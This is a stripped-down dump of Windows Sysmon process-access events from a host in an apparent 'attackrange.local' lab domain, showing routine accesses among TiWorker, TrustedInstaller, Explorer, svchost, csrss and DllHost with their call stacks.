12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.091{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.075{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.075{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.013{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565380C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565380C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.975{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 